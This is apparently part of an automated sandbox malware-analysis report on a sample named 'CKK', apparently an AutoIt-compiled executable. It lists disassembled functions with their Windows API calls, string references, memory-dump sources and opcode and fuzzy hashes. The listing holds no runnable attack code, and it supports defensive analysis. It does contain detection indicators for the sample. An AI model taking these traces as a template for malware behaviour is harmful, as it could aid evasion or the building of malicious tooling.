Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e986a2b74923772353d81041103e2ab5433f2b9b9074fbd4cfd083dd82a4171d
Instruction ID: 73d5f99842bbb831ad55023b5fa70b3879a27d640bd84cb4351df24cb2b2e829
Opcode Fuzzy Hash: e986a2b74923772353d81041103e2ab5433f2b9b9074fbd4cfd083dd82a4171d
Instruction Fuzzy Hash: C4017533709236ABCF218BBDBC4495677A89F46B71B110634E905E7140D725D9028AF0

Uniqueness

Uniqueness Score: -1.00%

Function 009FEC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009FFE66

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: c2dad227023de7e6b174d82b14f7807d3113ed221a2a1cf670d8a8af0e1cbe9c
Instruction ID: 9f3279e568b5c6f087ad4dc663d546278b3008e7f6cbf75dfe602658ba4fd2bf
Opcode Fuzzy Hash: c2dad227023de7e6b174d82b14f7807d3113ed221a2a1cf670d8a8af0e1cbe9c
Instruction Fuzzy Hash: 6AB26874608349CFCB24CF18D4A0B2AB7E1BF89314F24496DEA959B3A1D775EC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A0FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00A10668

Part of subcall function 00A132A4: RaiseException.KERNEL32(?,?,?,00A1068A,?,00AC1444,?,?,?,?,?,?,00A1068A,009F1129,00AB8738,009F1129), ref: 00A13304

__CxxThrowException@8.LIBVCRUNTIME ref: 00A10685

Strings

Unknown exception, xrefs: 00A10692

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 60efd2801232e2c33b6e292b63cc0bb5f353e3dde8e1e5ea8f144740931d829b
Instruction ID: 17d30a0ecee03423ce884a245a8e7ccc9230eecb259a6dabc9cc05434f257152
Opcode Fuzzy Hash: 60efd2801232e2c33b6e292b63cc0bb5f353e3dde8e1e5ea8f144740931d829b
Instruction Fuzzy Hash: 46F0C23490030DBBCF10BB68E956CDE7B6D6E00354B608531B924E69D2EFB1DAE6C680

Uniqueness

Uniqueness Score: -1.00%

Function 00191060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 001910A5
ExitProcess.KERNELBASE(00000000), ref: 001910C4

Strings

D, xrefs: 00191071

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
Instruction ID: 88a78f859713284d90b524f965b147c9bc206a357fa9c00d352027d66767015f
Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
Instruction Fuzzy Hash: 06F0EC7294024CABDF60DFE0CC49FEE777CBF04701F548508FA0A9A180DB7596488B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A63017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A6302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A63044

Strings

aut, xrefs: 00A63038

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a6f76ea2880a9d3a6d719354144fe0d673d782916fee65c687585e2e11cafff6
Instruction ID: ec9f6303e5c96cbf73b1aab8cc2dce44396a855fc5cae3aa2c8926f919d94cee
Opcode Fuzzy Hash: a6f76ea2880a9d3a6d719354144fe0d673d782916fee65c687585e2e11cafff6
Instruction Fuzzy Hash: C1D05E7250032877DA20E7E4AC0EFCB3A6CEB04760F0006A1B655E20D1EAB49985CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A77F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A782F5
TerminateProcess.KERNEL32(00000000), ref: 00A782FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00A784DD

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 2f0a05e6e574be6a6d2fde4bcb942d86e3557e2da8a673a1a5bcabf789833f5d
Instruction ID: f692337eb8a3bb40e7ccf47f1904ac2166d1b51641578231eeab5b6644f00907
Opcode Fuzzy Hash: 2f0a05e6e574be6a6d2fde4bcb942d86e3557e2da8a673a1a5bcabf789833f5d
Instruction Fuzzy Hash: 1D127C71A083019FC714DF28C984B6ABBE1BF88324F04C95DE9998B252DB75ED45CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A25AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac1c4bbe12c7561e6e69c39b8b18539c3b28f25924a5630c7fd0c7396ade502
Instruction ID: b67d7a3eac2456a952ee927b9040ba94fb5c7a58d427c09c3120568bb5a1bfd6
Opcode Fuzzy Hash: 9ac1c4bbe12c7561e6e69c39b8b18539c3b28f25924a5630c7fd0c7396ade502
Instruction Fuzzy Hash: 7651D271E00629AFCB25DFBCEA45FEEBBB4BF45310F140069F405A7291E6319941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009F10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F1BF4
Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 009F1BFC
Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F1C07
Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F1C12
Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 009F1C1A
Part of subcall function 009F1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 009F1C22

Part of subcall function 009F1B4A: RegisterWindowMessageW.USER32(00000004,?,009F12C4), ref: 009F1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009F136A
OleInitialize.OLE32 ref: 009F1388
CloseHandle.KERNEL32(00000000), ref: 00A324AB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 38492ff7d1d4d8de2ac96e071e2ec97ffe2c44f40266e891d5d49202111a3fba
Instruction ID: 04b5f169dc8629626dbe4ec7a1afa734a9445d15894c20ae586063b440290686
Opcode Fuzzy Hash: 38492ff7d1d4d8de2ac96e071e2ec97ffe2c44f40266e891d5d49202111a3fba
Instruction Fuzzy Hash: 94719EB4B152088FC784EFF9AA45E653AE0FB8A354756816ED10AD7363EB308443CF94

Uniqueness

Uniqueness Score: -1.00%

Function 009F54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 009F556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 009F557D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: fafc52af4a1c1fa7d0d35bb8b675897573ddd07e231419b067c0a502a88d0b2d
Instruction ID: 83411de4a13765b5ed1183088412443de5be7b0581d71ffe6aba61a3235a0145
Opcode Fuzzy Hash: fafc52af4a1c1fa7d0d35bb8b675897573ddd07e231419b067c0a502a88d0b2d
Instruction Fuzzy Hash: 95315E71A00A09FFDB14CF68C880BA9B7B6FB48314F15862AFA1597240D775FE94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 00A28704
GetLastError.KERNEL32(?,00A285CC,?,00AB8CC8,0000000C), ref: 00A2870E
__dosmaperr.LIBCMT ref: 00A28739

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 7fa58f309c16ebe85754026d5b45ea8a2abcdb00360ed2466f39fcea4f6e534a
Instruction ID: 6c4690462b00aa2a8f93dda6043c79492ad132e24cd3742dba36dc63ee3d84c3
Opcode Fuzzy Hash: 7fa58f309c16ebe85754026d5b45ea8a2abcdb00360ed2466f39fcea4f6e534a
Instruction Fuzzy Hash: BA016B32A0623026D220E37CB949B7E67594B82774F390139F8148F0D3DEB8CC829290

Uniqueness

Uniqueness Score: -1.00%

Function 00A62FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00A62FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A63006
CloseHandle.KERNEL32(00000000), ref: 00A6300D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 531261f408ab06d1a6d4f1e97dae8758e41db2d8d63abab164fa8268e129fd6e
Instruction ID: ba335f9ab9fb46202a3be4547b3f7b94ceb7c7701c33eb1dd49da255f10db7f9
Opcode Fuzzy Hash: 531261f408ab06d1a6d4f1e97dae8758e41db2d8d63abab164fa8268e129fd6e
Instruction Fuzzy Hash: B3E0863228021077D6301795BC4DF8B3E1CD78AB71F114210F719790D086B0150357B8

Uniqueness

Uniqueness Score: -1.00%

Function 00A01310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A017F6

Strings

CALL, xrefs: 00A017C6

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 3cc52da2b4de0789d2bd7f9b1610f76c22e8ba4a7cbd68bfe2276cb0a0804bd8
Instruction ID: 42530ef10e10c37da358d068372a1d0a10d6f558f340a44ab17829246f07a353
Opcode Fuzzy Hash: 3cc52da2b4de0789d2bd7f9b1610f76c22e8ba4a7cbd68bfe2276cb0a0804bd8
Instruction Fuzzy Hash: 5922ACB46083459FC714CF14D880B6ABBF1BF89314F24892DF4968B3A1D772E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A66EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A66F6B

Part of subcall function 009F4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A66F5A, 00A66F63

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 239fcafb5297a7ae03cac6e09ea9f1aa4bfe28ba3fb11c8141d7447cd1d1c67c
Instruction ID: 5f54bba7a9c2bdd1aaa1b3a23dcc99fcc9504c5ff33518e00826e1dfdd6a11b5
Opcode Fuzzy Hash: 239fcafb5297a7ae03cac6e09ea9f1aa4bfe28ba3fb11c8141d7447cd1d1c67c
Instruction Fuzzy Hash: ADB17E711182058FCB14EF20C491ABEB7F5AFD4314F04896DF59A972A2EB70ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00A2C84C

Strings

, xrefs: 00A2C891

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 7bbe58f8c9cca95008fe62d9ac712635aa39615218ab0bb04b83d1f45ef42b4d
Instruction ID: e77a6c4f4a8077201dadbc3d842fcecbb16872b8c631a3e0895b6ec2d30bd90b
Opcode Fuzzy Hash: 7bbe58f8c9cca95008fe62d9ac712635aa39615218ab0bb04b83d1f45ef42b4d
Instruction Fuzzy Hash: 574126709042A89ADB218F6C9D84AFEBBB9EB45314F2404FDE58A87142D2359A85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009F2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00A32C8C

Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2

Part of subcall function 009F2DA5: GetLongPathNameW.KERNELBASE ref: 009F2DC4

Strings

X, xrefs: 00A32C5A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 3fafc455891e6c21aec4ef4833604b32745c97b0ef83bd69a9f48b9736839cbc
Instruction ID: d66d94a6c17b2717d1415276203d4e18d1ab3676e142aea9a7a25a7f1f6abb96
Opcode Fuzzy Hash: 3fafc455891e6c21aec4ef4833604b32745c97b0ef83bd69a9f48b9736839cbc
Instruction Fuzzy Hash: 64219371A0029C9BCB01DF94C845BEE7BFCAF89314F108059E505AB241DBB89A898F61

Uniqueness

Uniqueness Score: -1.00%

Function 00A62557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A62587

Strings

EA06, xrefs: 00A625B9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 5b237a17ebd0d76ff544d0803adeafdea1c70192d4b7d5620afd494522c5e7f9
Instruction ID: d92078151bab9569b5faea205e322c271b22fb2ee11c9bbf280c188a8d09ca0c
Opcode Fuzzy Hash: 5b237a17ebd0d76ff544d0803adeafdea1c70192d4b7d5620afd494522c5e7f9
Instruction Fuzzy Hash: 6F01B1729042687EDF28C7A8C856FEEBBFC9B05301F00459AF593D21C1E5B8E6488B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A23467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00A234D8

Strings

LCMapStringEx, xrefs: 00A23478, 00A23482

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 47e26d71a05e7528a1f64ae51f790448a01d0a6925aa9bb89e6c4c16992f9761
Instruction ID: 9e51caccd9c47c50e8ffd5b708d69f69d1b38d84d68ab25e201d69576d537fb6
Opcode Fuzzy Hash: 47e26d71a05e7528a1f64ae51f790448a01d0a6925aa9bb89e6c4c16992f9761
Instruction Fuzzy Hash: F101293264021CBBCF12AF95DD01EEE7FA2EF08761F004154FE042A160C636C971EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A23162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00A231A1

Strings

FlsAlloc, xrefs: 00A23173, 00A2317D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 827250f0e2a5d66a6d42b6d448e0cd3f485d0796acee818f2959dfc171feed7e
Instruction ID: e40f3e131b422506f50e9ccb68d0d76645694d9c363c8827c91d16625d6895a7
Opcode Fuzzy Hash: 827250f0e2a5d66a6d42b6d448e0cd3f485d0796acee818f2959dfc171feed7e
Instruction Fuzzy Hash: 8AE0553678122CB7DF00ABA4AD02FAEBBA0EF54721B000226F80457240C9700F12DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00A13600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00A13615

Strings

FlsAlloc, xrefs: 00A13604, 00A1360E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: e02d01054c01971ea94394a63ffa89313b1166a29ba83f2aff3d6e9671bd211a
Instruction ID: 22cbc100c871c2df35dcb0d568b76ce09cabae7a624897bfaf54a783921c6a7d
Opcode Fuzzy Hash: e02d01054c01971ea94394a63ffa89313b1166a29ba83f2aff3d6e9671bd211a
